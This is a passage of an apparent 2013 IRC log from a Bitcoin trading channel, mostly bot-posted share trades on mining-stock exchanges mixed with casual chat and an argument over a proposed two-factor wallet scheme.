27 19:43:44 and digestive issues Jul 27 19:43:58 [BTCTC] [ACTIVEMINING] 53 @ 0.005499 = 0.2914 BTC [+] Jul 27 19:44:03 Im 6 foot even and should be around 180 pounds plus or minus Jul 27 19:44:12 Im a very big framed german build Jul 27 19:44:20 so Ill probably never hit that Jul 27 19:46:11 and plus, I plan on working out like all the time Jul 27 19:46:26 Im going to veer into douchebag-at-the-gym territory Jul 27 19:47:35 bitcoiner going to the gym? good one Jul 27 19:47:50 well, Im not going to go to a gym for real Jul 27 19:48:00 I can just build one at home. Jul 27 19:48:37 or just download a game called gym and do a virtual workout Jul 27 19:49:29 that doesnt give you giant muscles Jul 27 19:49:46 then I'll create a program to play the game for me Jul 27 19:51:38 lol Jul 27 19:51:52 MYMINER anyone? Jul 27 19:52:06 just thinking of a device you could strap to your muscles that vibrates Jul 27 19:52:46 VanCleef: yeah they invented that in the 50s Jul 27 19:52:48 it doesnt work Jul 27 19:52:59 [BTCTC] [ACTIVEMINING] 4 @ 0.005499 = 0.022 BTC [+] Jul 27 19:53:03 i mean like a ps3 device Jul 27 19:53:11 a dildo? Jul 27 19:53:22 possibly Jul 27 19:53:47 well Jul 27 19:53:55 the ps2 had that device for rez or whatever that game was Jul 27 19:54:59 sitting here in a sling and messed up back and damn i want a new body that works again, something robotic Jul 27 19:57:37 [BTCTC] [ACTIVEMINING] 25 @ 0.005402 = 0.1351 BTC [-] Jul 27 19:57:39 [BTCTC] [ACTIVEMINING] 26 @ 0.005401 = 0.1404 BTC [-] Jul 27 19:57:41 [BTCTC] [ACTIVEMINING] 100 @ 0.005399 = 0.5399 BTC [-] Jul 27 19:57:43 [BTCTC] [ACTIVEMINING] 182 @ 0.005396 = 0.9821 BTC [-] Jul 27 20:01:04 [MPEX] [S.MG] 1 @ 0.00025 BTC [+] Jul 27 20:11:38 [BTCTC] [ACTIVEMINING] 25 @ 0.005399 = 0.135 BTC [+] Jul 27 20:11:40 [BTCTC] [ACTIVEMINING] 100 @ 0.005398 = 0.5398 BTC [-] Jul 27 20:11:42 [BTCTC] [ACTIVEMINING] 178 @ 0.005396 = 0.9605 BTC [-] Jul 27 20:12:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0034 BTC [+] Jul 27 20:21:54 [BTCTC] [ACTIVEMINING] 27 @ 0.005494 = 0.1483 BTC [+] Jul 27 20:21:56 [BTCTC] [ACTIVEMINING] 33 @ 0.0055 = 0.1815 BTC [+] Jul 27 20:24:16 [BTCTC] [ACTIVEMINING] 350 @ 0.0055 = 1.925 BTC [+] Jul 27 20:24:29 [BTCTC] [BASIC-MINING] 1 @ 0.543 BTC [+] Jul 27 20:24:30 [BTCTC] [BASIC-MINING] 4 @ 0.544 = 2.176 BTC [+] Jul 27 20:29:01 [BTCTC] [ACTIVEMINING] 25 @ 0.005499 = 0.1375 BTC [-] Jul 27 20:29:03 [BTCTC] [ACTIVEMINING] 1010 @ 0.005323 = 5.3762 BTC [-] Jul 27 20:29:33 [BTCTC] [ACTIVEMINING] 13 @ 0.005497 = 0.0715 BTC [+] Jul 27 20:33:52 [BTCTC] [COGNITIVE] 1 @ 0.63 BTC [-] Jul 27 20:35:32 [BTCTC] [TAT.ASICMINER] 50 @ 0.04453 = 2.2265 BTC [-] Jul 27 20:35:35 [BTCTC] [TAT.ASICMINER] 25 @ 0.0445 = 1.1125 BTC [-] Jul 27 20:35:37 [HAVELOCK] [AM100] 1 @ 0.04339 BTC [-] Jul 27 20:36:31 [HAVELOCK] [AM100] 250 @ 0.04339885 = 10.8497 BTC [+] Jul 27 20:40:27 [HAVELOCK] [HIM] 1 @ 0.208 BTC [-] Jul 27 20:40:29 [HAVELOCK] [HIM] 20 @ 0.209 = 4.18 BTC [+] Jul 27 20:40:32 [HAVELOCK] [HIM] 5 @ 0.2101 = 1.0505 BTC [+] Jul 27 20:40:34 [HAVELOCK] [HIM] 6 @ 0.2102 = 1.2612 BTC [+] Jul 27 20:40:36 [HAVELOCK] [HIM] 15 @ 0.2103 = 3.1545 BTC [+] Jul 27 20:40:38 [HAVELOCK] [HIM] 3 @ 0.2138 = 0.6414 BTC [+] Jul 27 20:41:02 [HAVELOCK] [HIM] 2 @ 0.2138 = 0.4276 BTC [+] Jul 27 20:41:05 [HAVELOCK] [HIM] 1 @ 0.21849 BTC [+] Jul 27 20:41:07 [HAVELOCK] [HIM] 12 @ 0.22 = 2.64 BTC [+] Jul 27 20:41:38 [BTCTC] [ACTIVEMINING] 5 @ 0.005447 = 0.0272 BTC [-] Jul 27 20:42:24 [BTCTC] [DMS.MINING] 2 @ 0.01288 = 0.0258 BTC [+] Jul 27 20:44:58 [BTCTC] [ACTIVEMINING] 25 @ 0.005445 = 0.1361 BTC [-] Jul 27 20:45:00 [BTCTC] [ACTIVEMINING] 34 @ 0.005446 = 0.1852 BTC [+] Jul 27 20:45:17 [BTCTC] [ACTIVEMINING] 92 @ 0.005446 = 0.501 BTC [+] Jul 27 20:46:41 [BTCTC] [COGNITIVE] 4 @ 0.63 = 2.52 BTC [-] Jul 27 20:46:43 [BTCTC] [COGNITIVE] 1 @ 0.63 BTC [-] Jul 27 20:47:11 [BTCTC] [DMS.SELLING] 19 @ 0.0203 = 0.3857 BTC [-] Jul 27 20:47:14 [BTCTC] [ACTIVEMINING] 328 @ 0.005499 = 1.8037 BTC [+] Jul 27 20:47:23 [BTCTC] [ACTIVEMINING] 11 @ 0.005446 = 0.0599 BTC [-] Jul 27 20:48:14 [BTCTC] [ACTIVEMINING] 781 @ 0.005446 = 4.2533 BTC [-] Jul 27 20:48:22 [BTCTC] [ACTIVEMINING] 300 @ 0.00545 = 1.635 BTC [+] Jul 27 20:48:24 [BTCTC] [ACTIVEMINING] 1162 @ 0.005446 = 6.3283 BTC [-] Jul 27 20:49:09 [BTCTC] [ACTIVEMINING] 1 @ 0.005445 BTC [-] Jul 27 20:52:00 [BTCTC] [ACTIVEMINING] 3 @ 0.005444 = 0.0163 BTC [-] Jul 27 20:57:34 usagi: so guess what Jul 27 20:57:48 usagi: the forum randomly doesnt email me. Jul 27 21:03:20 [BTCTC] [ACTIVEMINING] 17 @ 0.005438 = 0.0924 BTC [-] Jul 27 21:12:17 [BTCTC] [DMS.SELLING] 1 @ 0.021 BTC [+] Jul 27 21:18:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.04499 BTC [+] Jul 27 21:23:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.04499 BTC [+] Jul 27 21:27:49 [BTCTC] [ACTIVEMINING] 36 @ 0.005432 = 0.1956 BTC [-] Jul 27 21:35:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [+] Jul 27 21:44:43 [BTCTC] [ACTIVEMINING] 35 @ 0.005425 = 0.1899 BTC [-] Jul 27 21:44:45 [BTCTC] [ACTIVEMINING] 50 @ 0.005426 = 0.2713 BTC [+] Jul 27 21:44:47 [BTCTC] [ACTIVEMINING] 20 @ 0.005429 = 0.1086 BTC [+] Jul 27 21:44:48 [BTCTC] [ACTIVEMINING] 115 @ 0.005438 = 0.6254 BTC [+] Jul 27 21:49:35 [BTCTC] [TAT.ASICMINER] 27 @ 0.04473 = 1.2077 BTC [-] Jul 27 21:50:26 [BTCTC] [ACTIVEMINING] 50 @ 0.005437 = 0.2719 BTC [-] Jul 27 21:50:42 [BTCTC] [ACTIVEMINING] 32 @ 0.005438 = 0.174 BTC [+] Jul 27 21:51:18 [BTCTC] [ACTIVEMINING] 400 @ 0.005439 = 2.1756 BTC [+] Jul 27 21:51:37 [BTCTC] [ACTIVEMINING] 25 @ 0.005315 = 0.1329 BTC [-] Jul 27 21:52:00 [BTCTC] [ACTIVEMINING] 14 @ 0.005315 = 0.0744 BTC [-] Jul 27 21:52:12 [BTCTC] [ACTIVEMINING] 25 @ 0.005438 = 0.136 BTC [+] Jul 27 21:52:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005436 = 0.1359 BTC [-] Jul 27 21:52:54 [BTCTC] [ACTIVEMINING] 45 @ 0.005437 = 0.2447 BTC [+] Jul 27 21:54:16 [BTCTC] [ACTIVEMINING] 2 @ 0.005437 = 0.0109 BTC [+] Jul 27 21:54:59 How do I get BTC out of Bitfunder? wtf is this... Jul 27 21:55:20 The best way I found, is to never put money into bf. Jul 27 21:55:28 But Jul 27 21:55:38 lol Jul 27 21:55:41 Don't they have their payment processor? Jul 27 21:55:55 weexchange Jul 27 21:56:26 [HAVELOCK] [AM100] 113 @ 0.0430001 = 4.859 BTC [-] Jul 27 21:56:29 [HAVELOCK] [AM100] 257 @ 0.04300001 = 11.051 BTC [-] Jul 27 21:56:31 [HAVELOCK] [AM100] 30 @ 0.043 = 1.29 BTC [-] Jul 27 21:56:56 [HAVELOCK] [AM100] 19 @ 0.043 = 0.817 BTC [-] Jul 27 21:56:58 [HAVELOCK] [AM100] 5 @ 0.0428 = 0.214 BTC [-] Jul 27 21:57:00 [HAVELOCK] [AM100] 2 @ 0.04275 = 0.0855 BTC [-] Jul 27 21:58:31 I'm kinda curious as to how much btc btct makes off fees a day Jul 27 21:59:07 at this point i wouldn't care if it was 10% Jul 27 21:59:26 fckin bitfunder was there ever a more counterintuitive website design? Jul 27 22:01:11 rulother-gs: https://forum.litecoin.net/index.php/topic,551.msg35456.html#msg35456 Jul 27 22:01:15 Wish I could help ya Jul 27 22:01:17 Duffer1: because BOOTSTRAP YO Jul 27 22:01:29 lul Jul 27 22:02:32 Shit that's a hefty amount. Jul 27 22:02:33 wow, litecoin.net forum admin has the decency to actually run 21st century forum software Jul 27 22:02:36 unlike theymos Jul 27 22:03:12 ^^xD Jul 27 22:04:09 burnside = freddie mercury? Jul 27 22:07:13 [BTCTC] [DMS.SELLING] 7 @ 0.021 = 0.147 BTC [+] Jul 27 22:11:56 [BTCTC] [COGNITIVE] 6 @ 0.62 = 3.72 BTC [-] Jul 27 22:14:12 [BTCTC] [ACTIVEMINING] 16 @ 0.005499 = 0.088 BTC [+] Jul 27 22:16:32 [BTCTC] [ACTIVEMINING] 1054 @ 0.005499 = 5.7959 BTC [+] Jul 27 22:18:40 [BTCTC] [ACTIVEMINING] 25 @ 0.005369 = 0.1342 BTC [-] Jul 27 22:18:42 [BTCTC] [ACTIVEMINING] 50 @ 0.005368 = 0.2684 BTC [-] Jul 27 22:18:53 [BTCTC] [ACTIVEMINING] 35 @ 0.005367 = 0.1878 BTC [-] Jul 27 22:18:55 [BTCTC] [ACTIVEMINING] 10 @ 0.0055 = 0.055 BTC [+] Jul 27 22:25:20 [BTCTC] [B.YABMC] 1 @ 0.002401 BTC [-] Jul 27 22:25:22 [BTCTC] [B.YABMC] 12 @ 0.002383 = 0.0286 BTC [-] Jul 27 22:27:57 [BTCTC] [COG.F] 1 @ 8.5 BTC [+] Jul 27 22:28:14 [BTCTC] [BASIC-MINING] 5 @ 0.5398 = 2.699 BTC [-] Jul 27 22:28:19 hm Jul 27 22:28:31 !t bt cog.f Jul 27 22:28:33 [BTCT:COG.F] 1D: 8 / 8 / 8 (1 shares, 8 BTC), 7D: 8 / 10.11333 / 11.84 (3 shares, 30.3 BTC), 30D: 3.8 / 6.69142 / 12 (19 shares, 127.1 BTC) Jul 27 22:29:02 hrm? Jul 27 22:29:06 [BTCTC] [DMS.SELLING] 206 @ 0.021 = 4.326 BTC [+] Jul 27 22:29:08 [BTCTC] [DMS.SELLING] 44 @ 0.021 = 0.924 BTC [+] Jul 27 22:29:09 [BTCTC] [DMS.SELLING] 100 @ 0.02124 = 2.124 BTC [+] Jul 27 22:30:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.04529 = 0.2265 BTC [+] Jul 27 22:32:13 [BTCTC] [COGNITIVE] 2 @ 0.6685 = 1.337 BTC [+] Jul 27 22:35:39 just another cog in the f Jul 27 22:35:41 [BTCTC] [ACTIVEMINING] 10 @ 0.005489 = 0.0549 BTC [-] Jul 27 22:36:34 [BTCTC] [ACTIVEMINING] 1303 @ 0.005499 = 7.1652 BTC [+] Jul 27 22:36:50 [BTCTC] [ACTIVEMINING] 607 @ 0.0055 = 3.3385 BTC [+] Jul 27 22:36:52 [BTCTC] [ACTIVEMINING] 1943 @ 0.0055 = 10.6865 BTC [+] Jul 27 22:37:19 [BTCTC] [ACTIVEMINING] 57 @ 0.0055 = 0.3135 BTC [+] Jul 27 22:38:11 that's pretty cheap Jul 27 22:40:41 [BTCTC] [ACTIVEMINING] 350 @ 0.005509 = 1.9282 BTC [+] Jul 27 22:41:11 [BTCTC] [ACTIVEMINING] 700 @ 0.00551 = 3.857 BTC [+] Jul 27 22:42:13 [BTCTC] [ACTIVEMINING] 11 @ 0.005565 = 0.0612 BTC [+] Jul 27 22:43:04 "I understand this message is vague, but I want to gauge your interest before putting more time and energy into this" Jul 27 22:43:21 [BTCTC] [ACTIVEMINING] 20 @ 0.005566 = 0.1113 BTC [+] Jul 27 22:43:32 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0034 = 0.0068 BTC [+] Jul 27 22:43:50 [BTCTC] [ACTIVEMINING] 2 @ 0.005569 = 0.0111 BTC [+] Jul 27 22:45:49 [BTCTC] [ACTIVEMINING] 58 @ 0.005699 = 0.3305 BTC [+] Jul 27 22:46:10 :o Jul 27 22:46:26 [BTCTC] [ACTIVEMINING] 117 @ 0.0057 = 0.6669 BTC [+] Jul 27 22:46:56 [BTCTC] [ACTIVEMINING] 12 @ 0.005699 = 0.0684 BTC [-] Jul 27 22:47:49 [BTCTC] [ACTIVEMINING] 38 @ 0.005699 = 0.2166 BTC [-] Jul 27 22:48:14 [BTCTC] [ACTIVEMINING] 12 @ 0.005768 = 0.0692 BTC [+] Jul 27 22:48:52 [BTCTC] [ACTIVEMINING] 10 @ 0.005769 = 0.0577 BTC [+] Jul 27 22:48:53 [BTCTC] [ACTIVEMINING] 15 @ 0.005769 = 0.0865 BTC [+] Jul 27 22:49:19 [BTCTC] [ACTIVEMINING] 1282 @ 0.005774 = 7.4023 BTC [+] Jul 27 22:49:45 [BTCTC] [ACTIVEMINING] 200 @ 0.005775 = 1.155 BTC [+] Jul 27 22:50:17 [BTCTC] [ACTIVEMINING] 2365 @ 0.005777 = 13.6626 BTC [+] Jul 27 22:50:43 [BTCTC] [ACTIVEMINING] 166 @ 0.005779 = 0.9593 BTC [+] Jul 27 22:51:23 usagi: jesus, thats so 80s it hurts Jul 27 22:51:44 [BTCTC] [ACTIVEMINING] 58 @ 0.00578 = 0.3352 BTC [+] Jul 27 22:52:25 wtf -_-` Jul 27 22:52:31 no, bgc Jul 27 22:52:48 dunno Jul 27 22:53:48 [BTCTC] [ACTIVEMINING] 10 @ 0.005779 = 0.0578 BTC [-] Jul 27 22:54:09 kinda have an urge to watch American Psycho Jul 27 22:54:48 usagi: whatever happened to 80s hair Jul 27 22:56:07 does assbot not track bitfunder? Jul 27 22:56:18 it doesnt Jul 27 22:57:10 It should Jul 27 22:58:46 kako and Ukyo are still arm-wrestling over it Jul 27 22:59:03 [BTCTC] [DMS.MINING] 1 @ 0.0127 BTC [-] Jul 27 22:59:49 [BTCTC] [DMS.SELLING] 16 @ 0.02035 = 0.3256 BTC [-] Jul 27 23:06:05 usagi: lol computers from 80s anime Jul 27 23:06:50 [BTCTC] [RSM] 25 @ 0.0154 = 0.385 BTC [-] Jul 27 23:07:43 usagi: so, a band that also is a mercenary force Jul 27 23:07:49 where have I seen this plot before Jul 27 23:14:14 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Jul 27 23:22:38 [BTCTC] [ACTIVEMINING] 1 @ 0.005779 BTC [-] Jul 27 23:22:50 [BTCTC] [B.YABMC] 1 @ 0.0028 BTC [+] Jul 27 23:23:37 [BTCTC] [ACTIVEMINING] 8 @ 0.005702 = 0.0456 BTC [-] Jul 27 23:30:17 [BTCTC] [ACTIVEMINING] 385 @ 0.005699 = 2.1941 BTC [-] Jul 27 23:34:17 [BTCTC] [ACTIVEMINING] 25 @ 0.005778 = 0.1445 BTC [+] Jul 27 23:36:13 [BTCTC] [ACTIVEMINING] 2 @ 0.005414 = 0.0108 BTC [-] Jul 27 23:37:13 [BTCTC] [ACTIVEMINING] 2 @ 0.005416 = 0.0108 BTC [+] Jul 27 23:41:26 [BTCTC] [BMF] 3 @ 0.04479 = 0.1344 BTC [+] Jul 27 23:42:29 [BTCTC] [LTC-ATF.B2] 2 @ 0.01026 = 0.0205 BTC [+] Jul 27 23:44:17 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.0034 = 0.0238 BTC [+] Jul 27 23:44:45 [BTCTC] [S.BBET-PT] 29 @ 0.002 = 0.058 BTC [+] Jul 27 23:44:56 [BTCTC] [DMS.MINING] 2 @ 0.0126 = 0.0252 BTC [-] Jul 27 23:44:57 [BTCTC] [ACTIVEMINING] 8 @ 0.005774 = 0.0462 BTC [+] Jul 27 23:45:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.04531 BTC [+] Jul 27 23:49:33 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [+] Jul 27 23:54:50 [BTCTC] [DMS.MINING] 56 @ 0.0126 = 0.7056 BTC [-] Jul 27 23:56:53 [BTCTC] [TAT.VIRTUALMINE] 481 @ 0.003436 = 1.6527 BTC [+] Jul 28 00:01:22 [BTCTC] [ACTIVEMINING] 130 @ 0.005775 = 0.7508 BTC [+] Jul 28 00:02:14 [BTCTC] [BASIC-MINING] 2 @ 0.5311 = 1.0622 BTC [-] Jul 28 00:02:17 [BTCTC] [BASIC-MINING] 5 @ 0.531 = 2.655 BTC [-] Jul 28 00:02:19 [BTCTC] [BASIC-MINING] 35 @ 0.5303 = 18.5605 BTC [-] Jul 28 00:02:21 [BTCTC] [BASIC-MINING] 3 @ 0.5302 = 1.5906 BTC [-] Jul 28 00:02:31 [BTCTC] [BTC-BOND] 1 @ 0.009982 BTC [-] Jul 28 00:04:46 [BTCTC] [ACTIVEMINING] 12 @ 0.005705 = 0.0685 BTC [-] Jul 28 00:04:48 [BTCTC] [ACTIVEMINING] 22 @ 0.0057 = 0.1254 BTC [-] Jul 28 00:04:50 [BTCTC] [ACTIVEMINING] 45 @ 0.005699 = 0.2565 BTC [-] Jul 28 00:04:52 [BTCTC] [ACTIVEMINING] 137 @ 0.005501 = 0.7536 BTC [-] Jul 28 00:04:53 [BTCTC] [ACTIVEMINING] 275 @ 0.0055 = 1.5125 BTC [-] Jul 28 00:11:11 [HAVELOCK] [VTX] 14 @ 0.54 = 7.56 BTC [+] Jul 28 00:11:52 [HAVELOCK] [VTX] 1 @ 0.53000001 BTC [-] Jul 28 00:12:01 [HAVELOCK] [VTX] 4 @ 0.51 = 2.04 BTC [-] Jul 28 00:12:16 [HAVELOCK] [VTX] 2 @ 0.5021 = 1.0042 BTC [-] Jul 28 00:12:37 [HAVELOCK] [VTX] 20 @ 0.5 = 10 BTC [-] Jul 28 00:12:54 [HAVELOCK] [VTX] 1 @ 0.485 BTC [-] Jul 28 00:13:05 [HAVELOCK] [VTX] 9 @ 0.48001 = 4.3201 BTC [-] Jul 28 00:15:28 [BTCTC] [ACTIVEMINING] 734 @ 0.005775 = 4.2389 BTC [+] Jul 28 00:26:31 [BTCTC] [ACTIVEMINING] 127 @ 0.005698 = 0.7236 BTC [-] Jul 28 00:28:46 yeah especially seeing as its your fund Jul 28 00:29:00 usagi: at least its easy with mine Jul 28 00:29:23 once people stop selling me shares Jul 28 00:29:29 Good, good. Appliances delivery scheduled for the 1st August. Time to cash in some trading profits. Jul 28 00:29:32 is when I start saving up for the largest dividend in bitcoin history Jul 28 00:30:01 I'll take 500 of thoses Jul 28 00:31:17 heh Jul 28 00:31:36 I think most of the last 6000 shares are for sale anyhow Jul 28 00:32:20 [BTCTC] [ASICMINER-PT] 2 @ 4.62 = 9.24 BTC [+] Jul 28 00:32:22 [BTCTC] [ASICMINER-PT] 1 @ 4.643 BTC [+] Jul 28 00:32:28 looks like half only actually Jul 28 00:33:18 2,736 shares Jul 28 00:34:56 DeaDTerra, won't you please come around and pay DICE buyout. Faster. Jul 28 00:36:52 I'll go hijack his plane and switch him to some faster vessel. Jul 28 00:38:53 [BTCTC] [ACTIVEMINING] 44 @ 0.005698 = 0.2507 BTC [-] Jul 28 00:39:45 [BTCTC] [ACTIVEMINING] 86 @ 0.005698 = 0.49 BTC [-] Jul 28 00:42:49 [BTCTC] [DMS.SELLING] 1 @ 0.0205 BTC [+] Jul 28 00:42:51 [BTCTC] [DMS.SELLING] 49 @ 0.02038 = 0.9986 BTC [-] Jul 28 00:42:53 [BTCTC] [DMS.SELLING] 50 @ 0.02037 = 1.0185 BTC [-] Jul 28 00:44:16 [BTCTC] [DMS.SELLING] 31 @ 0.0203 = 0.6293 BTC [-] Jul 28 00:44:17 [BTCTC] [DMS.SELLING] 100 @ 0.02025 = 2.025 BTC [-] Jul 28 00:47:00 [BTCTC] [ACTIVEMINING] 130 @ 0.005698 = 0.7407 BTC [-] Jul 28 00:47:53 Neat... 3182.7215 BTC payment to be made. Jul 28 00:48:15 Python interface unloaded Jul 28 00:48:15 Tcl interface unloaded **** ENDING LOGGING AT Sun Jul 28 00:48:15 2013 **** BEGIN LOGGING AT Sun Jul 28 03:34:59 2013 Jul 28 03:42:03 [MPEX] [S.MPOE] 4300 @ 0.00079927 = 3.4369 BTC [-] Jul 28 03:48:47 http://www.reddit.com/r/Bitcoin/comments/1j676d/gavin_suggests_twofactor_protection_of_wallet/ Jul 28 03:48:50 Gavin suggests two-factor protection of wallet files : Bitcoin Jul 28 03:49:00 basically gavin just came up with a way to take over control of people's wallets. Jul 28 03:49:13 this'd be the point of no return for him. the bitcoin project is officially hijacked. Jul 28 03:51:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003305 BTC [-] Jul 28 03:51:12 [BTCTC] [TAT.VIRTUALMINE] 123 @ 0.003304 = 0.4064 BTC [-] Jul 28 03:52:35 http://www.reddit.com/r/Bitcoin/comments/1j676d/gavin_suggests_twofactor_protection_of_wallet/cbbmp46 is right it would be insane to have 2-of-2 Jul 28 03:52:37 fellowtraveler comments on Gavin suggests two-factor protection of wallet files Jul 28 03:52:45 [BTCTC] [BTC-BOND] 17 @ 0.009982 = 0.1697 BTC [-] Jul 28 03:52:47 [BTCTC] [BTC-BOND] 10 @ 0.009981 = 0.0998 BTC [-] Jul 28 03:52:48 [BTCTC] [BTC-BOND] 100 @ 0.00998 = 0.998 BTC [-] Jul 28 03:52:50 [BTCTC] [BTC-BOND] 29 @ 0.00995 = 0.2886 BTC [-] Jul 28 03:52:56 well as long as people don't use it… Jul 28 03:53:06 guy's much too polite about it. Jul 28 03:53:46 What the... how would that allow taking over control of people's wallets? Jul 28 03:53:54 dafuq Jul 28 03:54:20 i don't even see how he could introduce another factor than the privkey Jul 28 03:54:29 at the protocol level Jul 28 03:54:44 He doesn't? Jul 28 03:55:02 it wouldn't allow control of wallets, but it would allow blocking their usage Jul 28 03:55:18 and trusting a server operator… or even the server to be up when you need it… Jul 28 03:55:22 guess i'll have to open that reddit link, *shrugs* Jul 28 03:55:24 Namworld yes Jul 28 03:55:38 it's a fucking outrage. Jul 28 03:55:43 we're no longer friends. Jul 28 03:56:29 hum ok it's like splitting the privkey Jul 28 03:56:54 but that's retarded, you have to relay on some server to be able to spend anything Jul 28 03:57:11 That would be completly optional... either keep using as usual, or create a two key private key... Jul 28 03:57:13 [BTCTC] [ASICMINER-PT] 1 @ 4.586 BTC [-] Jul 28 03:57:16 [BTCTC] [ASICMINER-PT] 3 @ 4.585 = 13.755 BTC [-] Jul 28 03:58:19 but why not y-of-x keys in a decentralized way? Jul 28 03:58:52 Gavin's proposal doesn't change anything, it just adds an interface for making it easier to have a 2 factor setup with a second part of a private key on your own external server. Isn't it what he's proposing? Jul 28 03:59:18 Adding an interface for easier use of the multisig already available on the Bitcoin protocol? Jul 28 03:59:56 haven't thought of it thay way Jul 28 04:00:43 on another topic, does someone have a link to the neat Deprived bond description ? Jul 28 04:01:07 Well that's no hijack in any way. It doesn't change anything to the Bitcoin protocol. Jul 28 04:01:40 [BTCTC] [BASIC-MINING] 1 @ 0.549 BTC [+] Jul 28 04:01:42 [BTCTC] [BASIC-MINING] 3 @ 0.5579 = 1.6737 BTC [+] Jul 28 04:01:43 [BTCTC] [BASIC-MINING] 6 @ 0.558 = 3.348 BTC [+] Jul 28 04:01:53 Seems to be just a utility proposal. Jul 28 04:02:45 all shit starts as "completely optional" Jul 28 04:03:24 If it was forced, it wouldn't be Bitcoin. You can ALREADY do what he proposes assuming you had custom software for it. Jul 28 04:03:37 shamir? Jul 28 04:03:52 too complicated for these humans. Jul 28 04:03:57 better ruin everything for ease of use. Jul 28 04:04:10 Nothing that doesn't already exist with Bitcoin. Jul 28 04:04:32 [BTCTC] [ASICMINER-PT] 1 @ 4.581 BTC [-] Jul 28 04:04:34 [BTCTC] [ASICMINER-PT] 2 @ 4.58 = 9.16 BTC [-] Jul 28 04:04:46 It's just a tool. Like the message signature tool. Jul 28 04:04:55 so build shamir in. Jul 28 04:07:57 You can already create a multisig wallet. This is just a tool proposal to communicate to an external server a 2FA token and receive the partial signature back. You can already set this up manually. Jul 28 04:08:22 but it's not easy enough Jul 28 04:08:26 and it's SUPER important Jul 28 04:08:42 because Gavin had an idea Jul 28 04:09:22 All I mean is there's no fuss to be about it... it's just a tool, not a chain fork/change of protocol. Jul 28 04:09:37 oh, and a great way for the "dev team" to spend their time, too! Jul 28 04:09:40 I don't see anything wrong with modules for bitcoind/wallet softwares Jul 28 04:10:11 Well maybe the dev team should focus on more important things... but whatever. Jul 28 04:10:27 As long as they don't try touching the protocol. Jul 28 04:11:00 They can play as much as they want making little toys for bitcoind as far as I care. Jul 28 04:11:28 You all scared me for a moment. Jul 28 04:15:47 [BTCTC] [ACTIVEMINING] 13 @ 0.005749 = 0.0747 BTC [-] Jul 28 04:15:48 [BTCTC] [ACTIVEMINING] 26 @ 0.00575 = 0.1495 BTC [+] Jul 28 04:15:49 [BTCTC] [ACTIVEMINING] 187 @ 0.005773 = 1.0796 BTC [+] Jul 28 04:15:51 [BTCTC] [ACTIVEMINING] 374 @ 0.005774 = 2.1595 BTC [+] Jul 28 04:16:31 [BTCTC] [ACTIVEMINING] 110 @ 0.005687 = 0.6256 BTC [-] Jul 28 04:20:33 [BTCTC] [ACTIVEMINING] 25 @ 0.005771 = 0.1443 BTC [+] Jul 28 04:20:35 [BTCTC] [ACTIVEMINING] 13 @ 0.005772 = 0.075 BTC [+] Jul 28 04:20:37 [BTCTC] [ACTIVEMINING] 1 @ 0.005774 BTC [+] Jul 28 04:20:39 [BTCTC] [ACTIVEMINING] 120 @ 0.005779 = 0.6935 BTC [+] Jul 28 04:20:40 [BTCTC] [ACTIVEMINING] 321 @ 0.00578 = 1.8554 BTC [+] Jul 28 04:20:41 [BTCTC] [ACTIVEMINING] 892 @ 0.005796 = 5.17 BTC [+] Jul 28 04:20:42 [BTCTC] [ACTIVEMINING] 400 @ 0.005798 = 2.3192 BTC [+] Jul 28 04:20:43 [BTCTC] [ACTIVEMINING] 1028 @ 0.0058 = 5.9624 BTC [+] Jul 28 04:24:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.04532 BTC [-] Jul 28 04:24:41 [MPEX] [S.MPOE] 3535 @ 0.00079927 = 2.8254 BTC [-] Jul 28 04:24:43 [MPEX] [S.MPOE] 1000 @ 0.00079888 = 0.7989 BTC [-] Jul 28 04:24:45 [MPEX] [S.MPOE] 815 @ 0.00079887 = 0.6511 BTC [-] Jul 28 04:26:40 [HAVELOCK] [AM100] 52 @ 0.04240031 = 2.2048 BTC [-] Jul 28 04:31:30 http://trilema.com/2013/and-gavin-moves-on-to-the-dark-side-the-bitcoin-project-is-officially-hijacked/ Jul 28 04:31:33 And Gavin moves on to the dark side. The Bitcoin project is officially hijacked pe Trilema - Un blog Jul 28 04:31:52 [HAVELOCK] [AM100] 8 @ 0.04240031 = 0.3392 BTC [-] Jul 28 04:36:19 because Gavin had an idea << it wasn't his idea. Jul 28 04:37:46 bitcoin project ain't hijacked. Nothing changed at all... Jul 28 04:38:00 You can already setup 2FA with the CURRENT bitcoind Jul 28 04:38:07 you could. Jul 28 04:38:19 the issue is that the people claiming to be the bitcoin developers are hostile to bitcoin Jul 28 04:38:22 that's what hijack means. Jul 28 04:38:31 when a project is led by people who aim at its demise rather than its success. Jul 28 04:39:20 [BTCTC] [TAT.ASICMINER] 20 @ 0.04537 = 0.9074 BTC [+] Jul 28 04:40:29 It doesn't change anything tho to Bitcoin, nor does it do much to improve it (offline wallet being better) Jul 28 04:40:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.04537 = 0.9074 BTC [+] Jul 28 04:41:02 As far as I'm concerned he's just making some pretty useless toy which honestly doesn't concern me. Jul 28 04:41:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.04536 = 0.2268 BTC [-] Jul 28 04:41:37 it changes nothing objective. it just shows who gavin was. Jul 28 04:41:49 but you're not required to be concerned obviously. Jul 28 04:43:06 Time spent making toys is time not spent destroying the current protocol. Jul 28 04:43:28 I'll be concerned when it's messed with and refuse to upgrade at that point. Jul 28 04:44:05 think for a moment. he's already demonstrated the ability to create a hard fork, and the ability to pick the winning side IN SPITE of anything. Jul 28 04:44:18 put one and one together rather than being lazy and "it doesn't concern me". Jul 28 04:45:01 [BTCTC] [TAT.ASICMINER] 52 @ 0.04494 = 2.3369 BTC [-] Jul 28 04:45:39 How would keeping an old client prevent other people from switching according to Gavin's will? It doesn't. Jul 28 04:46:20 Either people switch and refuse Bitcoin from the old protocol fork. I'll just sell my Bitcoins. Jul 28 04:46:39 yes yes, i get it, you're not interested in bitcoin, you're interested in making a buck. Jul 28 04:46:42 Or they're smart enough to reject the new 